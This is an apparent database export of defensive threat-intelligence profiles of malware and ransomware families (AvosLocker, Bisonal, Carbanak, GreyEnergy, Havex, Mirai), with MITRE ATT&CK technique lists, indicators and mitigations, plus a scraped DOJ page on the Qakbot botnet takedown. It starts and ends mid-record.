SentinelOne's Hegel. \"Targets of espionage or disruption in today's world are not isolated to government networks but can overflow or directly hit private business simply because of their stance on a political issue or where they operate,\" he says. \"As we observed when Ukraine was invaded, things can shift overnight — so CISOs should remain aware of this activity as we continue to live with such geopolitical tension.\" Copyright © 2023 Informa PLC Informa UK Limited is a company registered in England and Wales with company number 1072954 whose registered office is 5 Howick Place, London, SW1P 1WG.                             The Threat Hunter's Playbook: Mastering Cloud Defense Strategies Managing Security In a Hybrid Cloud Environment How Businesses Can Counterpunch against Generative AI-Powered Ransomware Preventing Attackers From Navigating Your Enterprise Systems Passwords Are Passe: Next Gen Authentication for Today's Threats Concerns Mount Over Ransomware, Zero-Day Bugs, and AI-Enabled Malware Everything You Need to Know About DNS Attacks Securing the Remote Worker: How to Mitigate Off-Site Cyberattacks How Enterprises Are Managing Application Security Risks in a Heightened Threat Environment Successfully Managing Identity in Modern Cloud and Hybrid Environments Threat Intelligence: Data, People and Processes Building Cyber Resiliency: Key Strategies for Proactive Security Operations Crucial Considerations when Enabling Secure Industrial Digital Transformation 9 Traits You Need to Succeed as a Cybersecurity Leader Cybersecurity in 2023 and beyond: 12 leaders share their forecasts Black Hat Europe - December 4-7 - Learn More Black Hat Middle East and Africa - Nov14-16 - Learn More Black Hat Japan Trainings - Nov 13-14 - Learn More SecTor - Canada's IT Security Conference Oct 23-26 - Learn More Threat Intelligence: Data, People and Processes Building Cyber Resiliency: Key Strategies for Proactive Security Operations The Threat Hunter's Playbook: Mastering Cloud Defense Strategies Managing Security In a Hybrid Cloud Environment Concerns Mount Over Ransomware, Zero-Day Bugs, and AI-Enabled Malware Everything You Need to Know About DNS Attacks Interop InformationWeek Network Computing ITPro Today Data Center Knowledge Black Hat Omdia About Us Advertise Reprints       Home Cookies Privacy Terms",
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64fa24fd795f37678cbb2cce"
  },
  "name": "AvosLocker",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "AvosLocker.pdf",
  "file_size": "63 KB",
  "content": "Threat Group Overview:\n\nAvosLocker is a ransomware that is written in C++ that is offered through the RaaS model. It\nwas first observed in 2021. It has been used against financial services, government facilities,\nand other critical infrastructure sectors in the United States. As of 2022, it has been used\nagainst organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria,\nTaiwana, Turkey, the United Arab Emirates, and the United Kingdom.\n\nSources:\n\nBleeping Computer\n\nCISA\n\nMitre\n\nSophos\n\nTrend Micro\n\nIntent:\n\nThe main intention behind AvosLocker is to gain access to private data so they can exploit them\nin order to manipulate you to pay their ransom. Before the encryption, the malware will map out\naccessible drives and enumerated files into directories. It encrypts files while creating a ransom\nnote named GET_YOUR_FILES_BACK\n\nMotivation:\n\nMoney is the primary motivation for AvosLocker.\n\nTarget(s):\n\nAvosLocker targets multiple critical infrastructure sectors in the United States. These sectors\ninclude financial services, critical manufacturing, and government facilities\n\n\fOpportunity:\n\nAvosLockers most viable attack vectors are its ability to use a remote administration tool\nAnyDesk and its ability to run safe mode.\n\nCapabilities (TTPs):\n\nExecution\n\n Native API (T1106)\n\nPersistence\n\n Registry Run Keys / Startup Folder (T1547.001)\n\nPrivilege Escalation\n\n Registry Run Keys / Startup Folder (T1547.001)\n\nDefense Evasion\n\n Deobfuscate/Decode Files or Information (T1140)\n\n Hidden Window (T1564.003)\n\n Safe Mode Boot (T1562.009)\n\n Masquerade File Type (T1036.008)\n\n Obfuscate File or Information (T1027)\n\n Dynamic API Resolution (T1027.007)\n\nDiscovery\n\n File and Directory Discovery (T1083)\n\n Network Share Discovery (T1135)\n\n Process Discovery (T1057)\n\n\f System Time Discovery (T1124)\n\nImpact\n\n Data Encrypted for Impact (T1486)\n\n Service Stop (T1489)\n\n System Shutdown/Reboot (T1529)\n\nConsequences:\n\nConsequences of an AvosLocker attack would be loss of sensitive, personal data. If you decide\nto pay the ransom, you would also lose money as well.\n\nIoCs (Behaviors):\n\nFrom CISA:\n\n Encryption and the ransom demand\n\n Data published on the leak site\n\n Phone calls and DDOS attacks\n\n Modification of the Windows Registry Run keys and the use of scheduled tasks\n\nMitigation:\n\nFrom CISA:\n\n Implement a recovery plan to maintain and retain multiple copies of sensitive proprietary\n\ndata and servers in a physical separate, segmented, and secure location.\n\n Implement network segmentation and maintain offline backups of data to ensure limited\n\ninterruption to the organization\n\n\f Regularly back up data, password protect backup copies offline. Ensure copies of critical\ndata are not accessible for modification or deletion from the system where the data\nresides.\n\n Install and regularly update antivirus software on all hosts, and enable real time\n\ndetection\n\n Install updates/patch operating systems, software, and firmware as soon as\n\nupdates/patches are released\n\n Review domain controllers, servers, workstations, and active directories for new or\n\nunrecognized user accounts.\n\n Audit user accounts with administrative privileges and configure access controls with\n\nleast privilege in mind. Do not give all users administrative privileges.\n\n Disable user ports\n\n Consider adding an email banner to emails received from outside your organization\n\n Disable hyperlinks in received emails\n\n Use multifactor authentication where possible\n\n Use strong passwords and regularly change passwords to network systems and\n\naccounts, implementing the shortest acceptable timeframe for password changes. Avoid\nreusing passwords for multiple accounts.\n\n Require administrator credentials to install software\n\n Only use secure networks and avoid using public wifi-networks. Consider installing and\n\nusing a VPN.\n\n Focus on cybersecurity awareness and training. Regularly provide users with training on\ninformation security principles and techniques as well as overall emerging cybersecurity\nrisks and vulnerabilities\n\nResources:\n\nIt is unknown who resources AvosLocker.\n\n\fThreat Score:\n\n3\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-07T19:31:09.272Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64fa27fc795f37678cbb2cd2"
  },
  "name": "Bisonal",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Bisonal.pdf",
  "file_size": "61 KB",
  "content": "Threat Group Overview:\n\nBisonal is a RAT that has been used by the Tonto Team against different sectors, public or\nprivate, in Russia, South Korea, and Japan since 2010. This RAT is believed to be exclusively\nused by Chinese groups.\n\nSources:\n\nDark Reading\n\nTalos Intelligence\n\nReactionary\n\nMitre\n\nIntent:\n\n Simply stated, this RATs main intent is to gain access to the systems information,\n\nexecute commands, and download/run files on the victims machine..\n\nFrom Talos Intelligence:\n\n Gain access into victims networks through spear phishing schemes.\n\n They tend to have very specific targets\n\n The end game was more around operational intelligence gathering and espionage.\n\n To constantly evolve in order to lower detection rate and increase success\n\nFrom Reactionary:\n\n Uses various methods to avoid detection and gain access to the victims network\n\n May use Microsoft Office add-ins to abuse persistence in a compromised system.\n\n\f To manipulate features of their artifacts to make them appear legitimate or benign to\n\nusers and/or security tools.\n\nMotivation:\n\nThe primary motivation behind Bisonal is to gain intelligence on whatever network is infiltrated.\n\nTarget(s):\n\nPrivate and public sectors in Russia, Japan, and Korea.\n\nOpportunity:\n\nBisonals greatest vector is its adaptability. It has been around for ten years, so it has had to\nchange how it attacks different systems in order to stay effective. They try to compromise the\nsystems files, so that they can gain access to information and try to cover their tracks.\n\nCapabilities (TTPs):\n\nInitial Access\n\n Spearphishing Attachment (T1566.001) Execution\n\n Visual Basic (T1059.005)\n\n Windows Command Shell (T1059.003)\n\n Native API (T1106)\n\n Malicious File (T1204.002)\n\nPersistence\n\n Registry Run Keys / Startup Folder (T1547.001)\n\n\f Windows Service (T1543.003)\n\n Add-ins (T1137.006)\n\nPrivilege Escalation\n\n Registry Run Keys / Startup Folder (T1547.001)\n\n Windows Service (T1543.003)\n\nDefense Evasion\n\n Deobfuscate/Decode Files or Information (T1140)\n\n File Deletion (T1070.004)\n\n Masquerading (T1036)\n\n Match Legitimate Name or Location (T1036.005)\n\n Modify Registry (T1112)\n\n Obfuscated Files or Information (T1027)\n\n Binary Padding (T1027.001)\n\n Software Packing (T1027.002)\n\n Rundll32 (T1218.011)\n\n Virtualization/Sandbox Evasion (T1497)\n\n Time Based Evasion (T1497.003)\n\nDiscovery\n\n File and Directory Discovery (T1083)\n\n Process Discovery (T1057)\n\n Query Registry (T1012)\n\n\f System Information Discovery (T1082)\n\n System Network Configuration Discovery (T1016)\n\n System Time Discovery (T1124)\n\n Virtualization/Sandbox Evasion (T1497)\n\n Time Based Evasion (T1497.003)\n\nCollection\n\n Data from Local System (T1005)\n\nCommand and Control\n\n Web Protocols (T1071.001)\n\n Standard Encoding (T1132.001)\n\n Dynamic Resolution (T1568)\n\n Symmetric Cryptography (T1573.001)\n\n Ingress Tool Transfer (T1105)\n\n Non-Application Layer Protocol (T1095)\n\n Proxy (T1090)\n\nExfiltration\n\n Exfiltration Over C2 Channel (T1041)\n\nConsequences:\n\nIf a Bisonal attack was successful, there would be a loss of sensitive data. It could also be used\nas a gateway for other malware to begin to attack the already compromised system.\n\nIoCs (Behaviors):\n\n\fSome of the typical indications of compromise are unusual network traffic, unusual system\nreboots, disabled security software, and changes to files without an explanation.\n\nMitigation:\n\nMonitor system and network discovery, process monitoring, and file scanning are all ways\ndamages could be lessened if an attack is successful. Analyzing network data for unexpected or\nunusual changes is another way to mitigate these attacks.\n\nResources:\n\nBisonal is resourced through the Chinese state-sponsored group, Tonto Team.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-07T19:43:56.933Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64fa2b18795f37678cbb2cd7"
  },
  "name": "Carbanak",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Untitled document.pdf",
  "file_size": "58 KB",
  "content": "Threat Group Overview:\n\nCarbanak is a banking trojan that was first discovered in 2014. It has been used to attack\nnumerous financial institutions in many different countries.\n\nSources:\n\nMalpedia\n\nMitre\n\nThe Record\n\nTrend Micro\n\nIntent:\n\nMitre and Malpedia both use nearly the exact same phrase to describe Carbanaks\nintentions.Carbanak is intended to be used for espionage, data exfiltration, and providing\nremote access to the infected networks.\n\nFrom Trend Micro:\n\n When planted into a system, it can log keystrokes and capture screenshots, steal and\n\ndelete cookies, inject malicious codes on sites, and monitor various traffic.\n\n Uses spear phishing techniques to infect the system.\n\nMotivation:\n\nThe main motivation behind this malware is money. By 2015, this malware had been used to\nbreach over one hundred banks in 40 countries to steal over one billion dollars.\n\nTarget(s):\n\n\fFinancial institutions all over the world are the primary targets of this malware.\n\nOpportunity:\n\nThis threat uses its spear phishing capabilities as its most viable attack vector. Once it gains a\nfoothold into the system, it is looking to abuse the cloud-based services from the dynamic data\nexchange feature in Windows.\n\nCapabilities (TTPs):\n\nExecution\n\n Windows Command Shell (T1059.003)\n\nPersistence\n\n Registry Run Keys / Startup Folder (T1547.001)\n\n Local account (T1136.001)\n\n Privilege Escalation\n\n Registry Run Keys / Startup Folder (T1547.001)\n\n-Portable Executable Injection (T1055.002)\n\nDefense Evasion\n\n File Deletion (T1070.004)\n\n Obfuscated Files or Information (T1027)\n\n Portable Executable Injection (T1055.002)\n\nCredential Access\n\n Keylogging (T1056.001)\n\n OS Credential Dumping (T1003)\n\n\fDiscovery\n\n Process Discovery (T1057)\n\n Query Discovery (T1012)\n\nLateral Movement\n\n Remote Desktop Protocol (T1021.001)\n\nCollection\n\n Local Email Collection (T1114.001)\n\n Keylogging (T1056.001)\n\n Screen Capture (T1113)\n\nCommand Control\n\n Web Protocols (T1071.001)\n\n Standard Encoding (T1132.001)\n\n Symmetric Cryptography (T1573.001)\n\nExfiltration\n\n Data Transfer Size Limits (T1030)\n\nConsequences:\n\nIf an attack was successful, there would be a large loss of money.\n\nIoCs (Behaviors):\n\nSome of the IoCs for Carbanak are unusual and anomalous behaviors, strange network traffic,\nevidence of phishing schemes, and large amounts of files being accessed, modified, or\ntransferred.\n\n\fMitigation:\n\nThere are several ways to mitigate the effects of Carbanak. Proper training in identifying\npossible threats, using multi-factored authentication to access sensitive files, regularly backing\nup data to offline or isolated environments to ensure that it can be backed up if stolen, and\nproactively threat hunting.\n\nResources:\n\nThe resourcing of Carbanak is not known publicly.\n\nThreat Score:\n\n2.33\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "added_on": {
    "$date": "2023-09-07T19:57:12.745Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_on": {
    "$date": "2023-09-07T19:58:13.966Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64fa2c69795f37678cbb2cd8"
  },
  "name": "GreyEnergy",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Untitled document-1.pdf",
  "file_size": "60 KB",
  "content": "Threat Group Overview:\n\nGreyEnergy is an evolution of the malware BlackEnergy. It poses heightened risks due to the\nfact that it has increased sophistication. With a primary emphasis on espionage and\nreconnaissance, it is specifically designed to gather sensitive information from targeted entities.\nGreyEnergy achieves distribution through tactics like spear phishing, leveraging targeted email\ncampaigns to deceive unsuspecting recipients. Additionally, it exploits vulnerabilities in\npublic-facing web servers to compromise systems and establish a foothold for its malicious\nactivities. By leveraging these techniques, GreyEnergy poses a significant threat to critical\ninfrastructure sectors and reinforces the importance of robust cybersecurity measures to counter\nthis advanced and elusive malware strain.\n\nSources:\n\n Bleeping Computer\n Dark Reading\n Mitre\n\nIntent:\n\nFrom Bleeping Computer:\n\n It is focused on espionage and reconnaissance operations on industrial control system\n\nworkstations running SCADA software and servers.\n\n Stealthily and persistently access the networks network and collect as much information\n\nit can. From Dark Reading:\n\n Gathering information from industrial networks belonging to critical infrastructure\n\norganizations in Ukraine and other countries.\n\n Building chains of proxy command-and-control servers for redirecting traffic from inside a\n\ncompromised network to its external servers.\n\n Use its initial lightweight first stage to capture as much information as possible and gain\n\na foothold on the compromised network.\n\nMotivation:\n\nGreyEnergy's motivation appears to be centered around gathering intelligence and conducting\ncyber espionage activities, particularly targeting critical infrastructure sectors such as energy\n\n\fand industrial systems. The group has been known to employ various tactics, techniques, and\nprocedures (TTPs) to gain unauthorized access to targeted networks, conduct reconnaissance,\nand gather sensitive information. Their activities often involve the use of sophisticated malware\nand targeted attacks.\n\nTarget(s):\n\nGreyEnergys primary targets are energy sectors. They also may target government entities and\nindustrial control systems.\n\nOpportunity:\n\nGreyEnergys most viable attack vector is its spearphishing campaigns. It seeks to compromise\nthe communication protocols, data historians, network infrastructures, and the backup and\nrecovery systems.\n\nCapabilities (TTPs):\n\nExecution\n\n Windows Command Shell (T1059.003)\n\nPrivilege Escalation\n\n Window service (T1543.003)\n\n Portable Executable Injection (T1055.002)\n\nDefense Evasion\n\n File Deletion (T1070.004)\n\n Modify Registry (T1112)\n\n Obfuscated Files or Information (T1027)\n\n Software Packing (T1027.002)\n\n\f Portable Executable Injection (T1055.002)\n\n Code Signing (T1553.002)\n\n Rundle32 (T1218.011)\n\nCredential Access\n\n Keylogging (T1056.001)\n\n LSASS Memory (T1003.001)\n\nDiscovery\n\n System Service Discovery (T1007)\n\nCollection\n\n Keylogging (T1056.001)\n\nCommand and Control\n\n Web Protocols (T1071.001)\n\n Asymmetric Cryptography (T1573.002)\n\n Symmetric Cryptography (T1573.001)\n\n Ingress Tool Transfer (T1105)\n\n Multi-hop Proxy (T1090.003)\n\nConsequences:\n\nConsequences would include things like data loss that could be exploited for financial gain or\nsold on the black market, service outages, infrastructure damage, and even economic impact.\n\nIoCs (Behaviors):\n\n\fIndications of compromise may involve unusual network traffic, unauthorized access attempts,\nunexplainable log entries or attempts, suspicious file activity, and detection by security.\n\nMitigation:\n\nYou can mitigate the effects of a successful GreyEnergy attack by developing a strong firewall\nsystem, conduct regular risk assessments, establish a response plan if an attack does happen,\nand not opening strange emails.\n\nResources:\n\nGreyEnergy is believed to be state funded. This suggests that actors have significant funding,\nadvanced technology, and intelligence capabilities.\n\nThreat Score:\n\n2.5\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-07T20:02:49.224Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64fa2d0c795f37678cbb2cda"
  },
  "name": "Havex",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Untitled document.pdf",
  "file_size": "62 KB",
  "content": "Threat Group Overview:\n\nHavex, a Remote Access Trojan (RAT) discovered in 2013, has significantly impacted critical\ninfrastructure sites across the United States and Europe. It has targeted various sectors,\nincluding energy, aviation, defense, pharmaceuticals, and petrochemicals. Within the energy\nsector, Havex specifically focused on energy grid operators, major electricity generation firms,\npetroleum pipeline operators, and industrial equipment providers, aiming to gain unauthorized\naccess to their systems. The malware's presence in other critical industries such as aviation,\ndefense, pharmaceuticals, and petrochemicals has raised concerns about potential breaches\nand their consequences. To mitigate the risk of RATs like Havex, it is crucial for organizations in\ncritical infrastructure sectors to implement robust cybersecurity measures, including network\nsegmentation, regular software updates, intrusion detection systems, and comprehensive\nemployee training programs, thereby safeguarding their systems from potential disruption or\ncompromise.\n\nSources:\n\n Malpedia\n CISA Article\n\nIntent:\n\nFrom a CISA Article:\n\n A threat actor tried to gain remote access to ICS-related information on compromised\n\nEnergy Sector networks.\n\n Extract data such as system information, lists of files and installed programs, e-mail\n\naddress books, and VPNs.\n\n Use spearphishing emails, redirects to compromised websites, and malicious versions of\n\nlegitimate software updates on ICS vendor websites.\n\n It causes common OPC platforms to crash.\n\nMotivation:\n\n\fThe motivation behind Havex, a Remote Access Trojan (RAT), can be attributed to various\nfactors depending on the actors involved. It is suspected that the malware is primarily motivated\nby economic espionage, seeking to gather sensitive information, intellectual property, or trade\nsecrets from targeted critical infrastructure sectors such as energy, aviation, defense,\npharmaceuticals, and petrochemicals. Additionally, Havex may aim to disrupt critical\ninfrastructure operations by compromising industrial control systems (ICS), causing system\nfailures or service interruptions. It could also serve as part of state-sponsored activities,\ninvolving reconnaissance, intelligence gathering, or establishing persistent access for potential\nfuture operations. Overall, Havex's motivations are likely driven by financial gain, geopolitical\ninterests, cyber warfare, or a combination of these factors.\n\nTarget(s):\n\nHavexs targets tend to be companies in the energy sector and industrial control systems.\n\nOpportunity:\n\nHavex uses tactics like spear phishing, watering hole attacks, and software supply chain attacks\nto compromise systems. It compromises the human-machine interfaces, the SCADA systems,\nand communication protocols during the attack.\n\nCapabilities (TTPs):\n\nPersistence:\n\n Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)\n\nPrivilege Escalation:\n\n Process Injection (T1055)\n\nDefense Evasion:\n\n Indicator Removal on host: File Deletion (T1070.004)\n\nCredential Access:\n\n Credentials from Password Stores: Credentials from Web Browsers (T1555.003)\n\nDiscovery:\n\n\f Account Discover: Email Account (T1087.003)\n\n File and Directory Discovery (T1083)\n\n Process Discovery (T1057)\n\n System Information Discovery (T1082)\n\n System Network Configuration Discovery (T1016)\n\n System Owner/User Discovery (T1033)\n\nCollection:\n\n Archive Collected Data (T1560)\n\nCommand and Control:\n\n Data Encoding: Standard Encoding (T1132.001)\n\nInitial Access:\n\n Spearphishing Attachment (T08655)\n\n Supply Chain Compromise (T0862)\n\nExecution:\n\n User Execution (T0863)\n\nDiscovery:\n\n Remote System Discovery(T0846)\n\n Remote System Information Discovery (T0888)\n\nCollection:\n\n Automated Collection (T0802)\n\n Point & Tag Identification (T0861)\n\n\fInhibit Response Function:\n\n Denial of Service (T0814)\n\nImpact:\n\n Denial of Control (T0813)\n\nConsequences:\n\nHavex is often associated with espionage, so it can be assumed that there would be stolen\ndata. There also would be some safety and environmental risks because the attackers could\ndisable alarms, manipulate safety protocols, and interfere with emergency shutdown\nmechanisms. There also could be some operational disruption and supply chain compromise.\n\nIoCs (Behaviors):\n\nIndications of compromise would be unusual network traffic, system performance issues,\nunauthorized system access, unusual process behavior, unexpected file modifications, and\nantivirus or security software alerts.\n\nMitigation:\n\nIn order to mitigate the effects of Havex, you need to implement strong cybersecurity measures,\nby conducting security assessments, by maintaining up-to-date software and firmware, by\nmonitoring network traffic and system, and regularly backing up data.\n\nResources:\n\nResourcing of Havex is currently unknown.\n\nThreat Score:\n\n2\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-07T20:05:32.406Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64fa2e02795f37678cbb2cde"
  },
  "name": "Mirai",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Untitled document.pdf",
  "file_size": "78 KB",
  "content": "Threat Group Overview:\n\nMirai, recognized as the most prevalent malware/botnet strains by MalwareBazaar by Abuse.ch\nas of 6/17/2023, surfaced in 2016 and gained considerable attention in 2023 following a CISA\nwarning and a subsequent federal mandate to update all government devices by June 21, 2023.\nInitially targeting Zyxel firewalls, Mirai has displayed the ability to expand its reach to other\nvulnerable devices, especially IoT devices. Mirai's notable impact lies in its capability to launch\nremote distributed denial-of-service (DDoS) attacks, primarily targeting industrial sectors.\n\nSources:\n\nBleepingComputer\n\nDarkReading\n\nHackRead\n\nHelpNetSecurity\n\nInfoSecurity-Magazine\n\nMalwareBazaar\n\nThe Hacker News\n\nTrendMicro\n\nIntent:\n\nFrom BleepingComputer:\n\nThe malware spreads by brute-forcing weak or default telnet/SSH credentials and\nexploiting hardcoded flaws to perform remote code execution on the target devices.\nOnce a device is breached, the malware infects the device and recruits it into its\nbotnet swarm.\n\nUnit 42 believes all three attack waves originate from the same threat actor\nbecause the hardcoded C2 domains contain the same string, the shell script\n\n\fdownloads are similar, and the botnet clients used in all attacks feature identical\nfunctions.\n\nThe botnet also attempts to terminate a set of processes from a hardcoded list,\nwhich includes other competing botnet malware families.\n\nFrom DarkReading:\n\nResearchers from Fortinet tracking the malware last year observed its authors\nregularly altering the malware, first by adding code to maintain persistence on\ninfected machines even after a reboot, and then with code for self-propagation via a\nremote binary downloader.\n\nLater, the malware authors removed the self-propagation feature and added one\nthat allowed them persistent remote access to brute forced SSH servers.\n\nFrom The Hacker News:\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a\nrecently patched critical security flaw in Zyxel gear to its Known Exploited\nVulnerabilities (KEV) catalog, citing evidence of active exploitation.\n\nTracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command\ninjection flaw impacting different firewall models that could enable an\nunauthenticated attacker to execute arbitrary code by sending a specially crafted\npacket to the device.\n\nFederal agencies in the U.S. are mandated to update their devices by June 21,\n2023.\n\n\"IoT devices have always been a lucrative target for threat actors, and remote code\nexecution attacks continue to be the most common and most concerning threats\naffecting IoT devices and linux servers,\" Unit 42 said.\n\n\"The vulnerabilities used by this threat are less complex, but this does not decrease\ntheir impact, since they could still lead to remote code execution.\"\n\nFrom HackRead:\n\nA variant of the Mirai botnet has successfully hacked various Zyxel Firewalls after\nexploiting a newly patched operating system command injection vulnerability\n(CVE-2023-28771).\n\n\fThe bug has affected many Zyxel network devices, and now that the Mirai botnet is\ncontrolling it, the problem can worsen as it can lead to launching DDoS attacks.\n\nThe botnet client first inspects the network portion of the compromised devices IP\naddress and avoids execution for a specific list of IP blocks. This includes\ngovernment networks, tech firms, and internet providers.\n\nThe Internet Key Exchange  IKE is the vulnerable component, explained a report\nfrom Rapid7.\n\nMotivation:\n\nThe motivation is dependent on the user.\n\nTarget(s):\n\n Private/Public Businesses\n\n Industrial Sectors\n\n Governments\n\nOpportunity:\n\n Weak or default telnet/SSH credentials\n\n Hard coded flaws\n\n Command injection flaws\n\n IKE vulnerabilities\n\nCapabilities (TTPs):\n\nInitial Access:\n\n\fExploitation of Remote Services (T0866):\n\nMirai injects malicious code via an exploitation of their victims remote services.\n\nExternal Remote Services (T1133):\n\nFor the purposes or self-propagation, Mirai utilizes a remote binary downloader to maintain\npersistence.\n\nCredential Access:\n\nBrute Force (T1110):\n\nMirai spreads by brute forcing weak or default telnet/SSH credentials.\n\nPersistence:\n\nCreate or Modify System Process (T1543):\n\nMirai scans for a hard coded list of processes to terminate or modify. This includes competing\nbotnets.\n\nBoot or Logon Autostart Execution (T1547):\n\nTo maintain persistence, Mirai adds itself to the system configuration to remain active, even after\na system reboot.\n\nExecution:\n\nCommand and Scripting Interpreter (T1059):\n\nMirai exploits command injection flaws to infect their unknowing victims.\n\nCommand and Control:\n\nProxy (T1090):\n\nMirai, across most of its attacks, have used the same hardcoded C2 channels to communicate\nwith the botnet.\n\nImpact:\n\n\fNetwork Denial of Service (T1498):\n\nAfter infecting systems, Mirai is known to utilize DDoS attacks on the compromised networks.\n\nConsequences\n\n Loss of services\n\n Recruitment of infected systems to a wider botnet\n\nIoCs (Behaviors):\n\n Unauthorized connections to endpoints.\n\n Unauthorized changes in system configuration.\n\n Sudden termination of services.\n\nMitigation:\n\n regularly update your system security.\n\n Patch vulnerabilities as they show up.\n\n Ensure the security of endpoint connections.\n\n Have up to date telnet/SSH credentials.\n\n In the case of infection, disconnect the IoT device from the network and perform a\n\nreboot.\n\n Disable Universal Plug and Play (UPnP) on routers unless absolutely necessary.\n\n Monitor IP port 2323/TCP and 23/TCP for attempts to gain unauthorized control over IoT\n\ndevices using Telnet protocol.\n\n\fResources:\n\nAs of now, it is unknown what resources Mirai has.\n\nThreat Score: 1.3\n\nOpportunity: 1\n\nMirai exploits unpatched vulnerabilities, or weak security. Thus, its opportunities are limited.\n\nConsequences: 2\n\nThe consequences could range from insignificant to severe.\n\nMitigation: 1\n\nMirai does not take a notable amount of resources to mitigate.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "added_on": {
    "$date": "2023-09-07T20:09:38.954Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_on": {
    "$date": "2023-09-07T20:13:18.090Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64fa41550940cdd46e7ee9ef"
  },
  "name": "Qakbot",
  "file_type": null,
  "website_url": "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources",
  "website_title": "DOCUMENTS AND RESOURCES RELATED TO THE",
  "file_name": null,
  "file_size": null,
  "content": "Welcome to the new look of justice.gov. In the coming months you’ll see more pages in this new design. Please share your feedback with our webmaster. An official website of the United States government    Qakbot Malware Disrupted in International Cyber Takedown (US Attorney’s Office Press Release) Qakbot Malware Disrupted in International Cyber Takedown (DOJ National Press Release) Beginning on August 25, 2023, law enforcement gained access to the Qakbot botnet, redirected botnet traffic to and through servers controlled by law enforcement, and instructed Qakbot-infected computers to download a Qakbot Uninstall file that uninstalled Qakbot malware from the infected computer. The Qakbot Uninstall file did not remediate other malware that was already installed on infected computers; instead, it was designed to prevent additional Qakbot malware from being installed on the infected computer by untethering the victim computer from the Qakbot botnet. Hash value for the Qakbot Uninstall file (SHA-256): As a result of this operation, the FBI and the Dutch National Police have identified numerous account credentials that were compromised by the Qakbot actors. The FBI has provided those credentials to the website Have I Been Pwned, which is a free resource for people to quickly assess whether their access credentials have been compromised in a data breach or other activity. The Dutch National Police have also set up a website that contains information about additional compromised credentials. You can check to see if your credentials were compromised at the following websites: This webpage will be updated as more resources become available. Victims are encouraged to report the cybercrimes with their local FBI field office or the Internet Crime Complaint Center (IC3) at ic3.gov. The following documents contain additional information for victims and network defenders: CISA Cybersecurity Advisory : Identification and Disruption of QakBot InfrastructureLinks to other government and non-government sites will typically appear with the “external link” icon to indicate that you are leaving the Department of Justice website when you click the link. (August 30, 2023) The Shadowserver Foundation: Qakbot Botnet DisruptionLinks to other government and non-government sites will typically appear with the “external link” icon to indicate that you are leaving the Department of Justice website when you click the link. (August 29, 2023) Spamhaus: Qakbot Breached Email AccountsLinks to other government and non-government sites will typically appear with the “external link” icon to indicate that you are leaving the Department of Justice website when you click the link. (August 29, 2023) Application, Search Warrant (2:23-MJ-4244), signed August 21, 2023 Application, Search Warrant (2:23-MJ-4248), signed August 23, 2023 Application, Seizure Warrant (2:23-MJ-4251), signed August 23, 2023 Central District of California\n312 North Spring Street\nSuite 1200\nLos Angeles, California 90012 Phone: 213-894-2400\nFax: 213-894-0141 Stay Connected  Have a question about Government Services?                                                                                           7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117 Have I Been Pwned (https://haveibeenpwned.com/)Links to other government and non-government sites will typically appear with the “external link” icon to indicate that you are leaving the Department of Justice website when you click the link. Dutch National Police (https://politie.nl/checkyourhack)Links to other government and non-government sites will typically appear with the “external link” icon to indicate that you are leaving the Department of Justice website when you click the link. Central District of California\n312 North Spring Street\nSuite 1200\nLos Angeles, California 90012 Phone: 213-894-2400\nFax: 213-894-0141 Stay Connected     Archives Budget & Performance FOIA Accessibility Legal Policies & Disclaimers Privacy Policy For Employees Information Quality Office of the Inspector General No FEAR Act Data Small Business Vote.gov Español Contact USA.gov",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-09-07T21:32:05.110Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_on": {
    "$date": "2023-09-07T21:37:51.883Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64ff5e3ff644071736369846"
  },
  "name": "Charming Kitten TA453",
